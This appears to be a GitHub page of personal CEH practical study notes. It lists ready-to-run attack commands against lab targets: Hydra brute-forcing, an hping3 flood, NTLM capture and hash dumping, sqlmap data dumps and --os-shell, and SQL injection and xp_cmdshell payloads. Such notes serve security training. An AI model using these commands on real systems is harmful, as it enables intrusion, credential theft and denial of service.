-
Notifications
You must be signed in to change notification settings - Fork 0
/
Cheat Sheets
167 lines (153 loc) · 5.89 KB
/
Cheat Sheets
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
NMAP Cheat sheet :-
https://www.stationx.net/nmap-cheat-sheet/
Bruteforce Cheatsheet :
https://book.hacktricks.xyz/brute-force --> ALL
ftp : hydra -l root -P passwords.txt [-t 32] <IP> ftp
ssh : hydra -l root -P passwords.txt [-t 32] <IP> ssh
smb : hydra -l Administrator -P words.txt 192.168.1.12 smb -t 1 , nmap --script smb-brute -p 445 <IP>
smtp : hydra -l <username> -P /path/to/passwords.txt <IP> smtp -V
mysql : hydra -L usernames.txt -P pass.txt <IP> mysql
rdp : hydra -V -f -L <userslist> -P <passwlist> rdp://<IP>
SQLMAP Cheatsheet :
https://www.security-sleuth.com/sleuth-blog/2017/1/3/sqlmap-cheat-sheet
Wireshark Cheatsheet :
https://www.stationx.net/wireshark-cheat-sheet/
WPSCAN :
https://blog.sucuri.net/2021/05/wpscan-how-to-scan-for-wordpress-vulnerabilities.html
ADB :
adb port : 55555
adb : https://book.hacktricks.xyz/pentesting/5555-android-debug-bridge
TOOLS : --------------
1- NMap
2- Hydra
3- WPScan
4- SQLMap
5- Owasp ZAP
6- Veracrypt
7- Wireshark
8- CrypTool
9- BCText Encoder
10- adb
CEH PRACTICLE MY NOTES : ----
Enumeration using Metasploit :
msfdb init
service postgresql start
msfconsole
msf > db_status
nmap -Pn -sS -A -oX Test 10.10.10.0/24
db_import Test
hosts -> To show all available hosts in the subnet
db_nmap -sS -A 10.10.10.16 -> To extract services of particular machine
services -> to get all available services in a subnet
SMB Version Enumeration using MSF
use scanner/smb/smb_version
set RHOSTS 10.10.10.8-16
set THREADS 100
run
hosts -> now exact os_flavor information has been updated
Module 03 : Scanning Networks
Port Scanning using Hping3:
hping3 --scan 1-3000 -S 10.10.10.10
--scan parameter defines the port range to scan and –S represents SYN flag.
Pinging the target using HPing3:
hping3 -c 3 10.10.10.10
-c 3 means that we only want to send three packets to the target machine.
UDP Packet Crafting
hping3 10.10.10.10 --udp --rand-source --data 500
TCP SYN request
hping3 -S 10.10.10.10 -p 80 -c 5
-S will perform TCP SYN request on the target machine, -p will pass the traffic through which port is assigned, and -c is the count of the packets sent to the Target machine.
HPing flood
hping3 10.10.10.10 --flood
Module 04 : Enumeration
SNMP Enumeration (161) :
nmap –sU –p 161 10.10.10.12
nmap -sU -p 161 --script=snmp-brute 10.10.10.12
msfconsole
use auxiliary/scanner/snmp/snmp_login
set RHOSTS and exploit
use auxiliary/scanner/snmp/snmp_enum
set RHOSTS and exploit
NetBIOS Enumeration (139) :
nbtstat –A 10.10.10.16
net use
net use \10.10.10.16\e ““\user:””
net use \10.10.10.16\e ““/user:””
NetBIOS Enumerator
Enum4Linux Wins Enumeration :
enum4linux -u martin -p apple -U 10.10.10.12 -> Users Enumeration
enum4linux -u martin -p apple -o 10.10.10.12 -> OS Enumeration
enum4linux -u martin -p apple -P 10.10.10.12 -> Password Policy Information
enum4linux -u martin -p apple -G 10.10.10.12 -> Groups Information
enum4linux -u martin -p apple -S 10.10.10.12 -> Share Policy Information (SMB Shares Enumeration
Active Directory LDAP Enumeration : ADExplorer
Module 05 : Vulnerability Analysis
nikto -h http://www.goodshopping.com -Tuning 1
Nessus runs on https://localhost:8834
Username: admin
Password: password
Nessus -> Policies > Advanced scan
Discovery > Host Discovery > Turn off Ping the remote host
Port Scanning > check the Verify open TCP ports found by local port enumerators
Advanced
Max number of TCP sessions per host and = unlimited
Max number of TCP sessions per scan = unlimited
Credentials > Windows > Username & Password
Save policy > Create new scan > User Defined
Enter name & Target
Schedule tab > Turn of Enabled
Hit launch from drop-down of save.
Module 06 : System Hacking
NTLM Hash crack :
responder -I eth0
usr\share\responder\logs --> Responder log location
john /usr/share/responder/logs/ntlm.txt
Rainbowtable crack using Winrtgen :
Open winrtgen and add new table
Select ntlm from Hash dropdown list.
Set Min Len as 4, Max Len as 6 and Chain Count 4000000
Select loweralpha from Charset dropdown list (it depends upon Password).
rcrack_gui.exe to crack hash with rainbow table
Hash dump with Pwdump7 and crack with ohpcrack :
wmic useraccount get name,sid --> Get user acc names and SID
PwDump7.exe > c:\hashes.txt
Replace boxes in hashes.txt with relevant usernames from step 1.
Ophcrack.exe -> load -> PWDUMP File
Tables -> Vista free -> select the table directory -> crack
Module 08 : Sniffing
http.request.method == “POST” -> Wireshark filter for filtering HTTP POST request
Capture traffic from remote interface via wireshark
Capture > Options > Manage Interfaces
Remote Interface > Add > Host & Port (2002)
Username & password > Start
Module 13 : Hacking Web Servers
FTP Bruteforce with Hydra
hydra -L /root/Desktop/Wordlists/Usernames.txt -P /root/Desktop/Wordlists/Passwords.txt ftp://10.10.10.11
Module 14 : Hacking Web Applications
Wordpress
wpscan --url http://10.10.10.12:8080/CEH --enumerate u
WP password bruteforce
msfconsole
use auxiliary/scanner/http/wordpress_login_enum
RCE
ping 127.0.0.1 | hostname | net user
Module 15 : SQL Injection
SQLMAP Extract DBS
sqlmap -u “http://www.moviescope.com/viewprofile.aspx?id=1” --cookie="xookies xxx" --dbs
Extract Tables
sqlmap -u “http://www.moviescope.com/viewprofile.aspx?id=1” --cookie="cookies xxx" -D moviescope --tables
Extract Columns
sqlmap -u “http://www.moviescope.com/viewprofile.aspx?id=1” --cookie="cookies xxx" -D moviescope -T User_Login --columns
Dump Data
sqlmap -u “http://www.moviescope.com/viewprofile.aspx?id=1” --cookie="cookies xxx" -D moviescope -T User_Login --dump
OS Shell to execute commands
sqlmap -u “http://www.moviescope.com/viewprofile.aspx?id=1” --cookie="cookies xxx" --os-shell
Login bypass
blah' or 1=1 --
Insert data into DB from login
blah';insert into login values ('john','apple123');
Create database from login
blah';create database mydatabase;
Execute cmd from login
blah';exec master..xp_cmdshell 'ping www.moviescope.com -l 65000 -t'; --
Module 19 : Cloud Computing